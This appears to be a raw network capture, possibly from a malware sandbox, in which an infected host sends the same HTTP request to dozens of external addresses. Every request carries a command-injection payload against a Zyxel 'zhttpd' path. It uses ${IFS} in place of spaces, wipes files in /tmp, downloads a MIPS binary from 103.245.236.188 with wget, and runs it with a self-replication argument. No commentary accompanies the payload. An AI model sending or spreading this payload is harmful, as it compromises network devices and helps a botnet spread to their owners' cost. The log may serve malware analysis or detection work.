                                    Jan 13, 2024 19:01:48.621263981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    259192.168.2.1336514198.251.175.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.621296883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    260192.168.2.1349054183.229.77.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.618393898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    261192.168.2.134370077.22.215.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.618407011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    262192.168.2.1355874179.201.199.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.618459940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    263192.168.2.1337806168.14.215.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.618486881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    264192.168.2.1350134105.199.84.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.618526936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    265192.168.2.1337986199.211.190.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.618555069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    266192.168.2.13499108.41.155.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.618578911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    267192.168.2.134546096.165.59.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.618599892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    268192.168.2.1360042123.88.68.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.618669033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    269192.168.2.133747071.188.27.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.618699074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    270192.168.2.1336422144.144.163.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.618709087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    271192.168.2.1354022135.83.194.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.618725061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    272192.168.2.1341658103.240.137.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.618779898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    273192.168.2.134609892.64.115.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.618829966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    274192.168.2.133711678.204.202.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.618904114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    275192.168.2.1337738101.26.16.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.619131088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    276192.168.2.1351184219.190.150.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.619153023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    277192.168.2.133698044.36.4.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.619153023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    278192.168.2.1358094175.243.107.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.619230032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    279192.168.2.1351764180.149.165.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:49.619277000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    280192.168.2.134388437.197.79.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:50.657110929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    281192.168.2.133576618.111.101.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:50.657126904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    282192.168.2.1345316201.246.211.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:50.657180071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    283192.168.2.1356726186.245.143.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:50.657212019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    284192.168.2.1343486139.128.111.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:50.657249928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    285192.168.2.134929413.71.34.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:50.657315969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    286192.168.2.1355900202.76.103.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:50.657344103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    287192.168.2.1338382208.112.83.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:50.657485962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    288192.168.2.1358496164.87.55.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:51.662905931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    289192.168.2.1348440190.35.132.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:51.662978888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    290192.168.2.136008098.59.10.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:51.663052082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    291192.168.2.134978242.102.89.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:51.663197994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    292192.168.2.1338750149.13.23.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:51.663249969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    293192.168.2.133343017.174.161.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:52.669230938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    294192.168.2.133675638.161.101.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:52.669317961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    295192.168.2.133919457.224.48.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:52.669349909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    296192.168.2.135007436.100.243.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:52.669365883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    297192.168.2.136036092.96.146.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.672930956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    298192.168.2.1355686183.239.36.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.672986984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    299192.168.2.133610676.117.43.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673029900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    300192.168.2.1352864155.41.227.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673046112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    301192.168.2.133768652.209.189.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673063993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    302192.168.2.135114695.201.77.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673094034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    303192.168.2.1332884152.42.254.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673147917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    304192.168.2.1342826129.231.237.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673186064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    305192.168.2.1344068167.128.127.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673192024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    306192.168.2.1346154130.212.231.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673238039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    307192.168.2.1338410109.174.60.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673275948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    308192.168.2.135641018.167.104.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673296928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    309192.168.2.1355984166.200.32.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673333883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    310192.168.2.1334054174.200.31.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673455000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    311192.168.2.135236667.250.99.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673578024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    312192.168.2.133601493.77.47.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673633099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    313192.168.2.135619274.13.109.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673691988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    314192.168.2.133657672.189.144.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673698902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    315192.168.2.135315697.28.93.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673733950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    316192.168.2.1345368111.157.120.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673758984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    317192.168.2.1354846105.143.32.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:53.673782110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    318192.168.2.13558781.58.165.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:54.677469969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    319192.168.2.133773037.207.164.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:54.677499056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    320192.168.2.134117687.70.144.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:54.677536011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    321192.168.2.1350520211.134.144.85443
                                    TimestampBytes transferredDirectionData
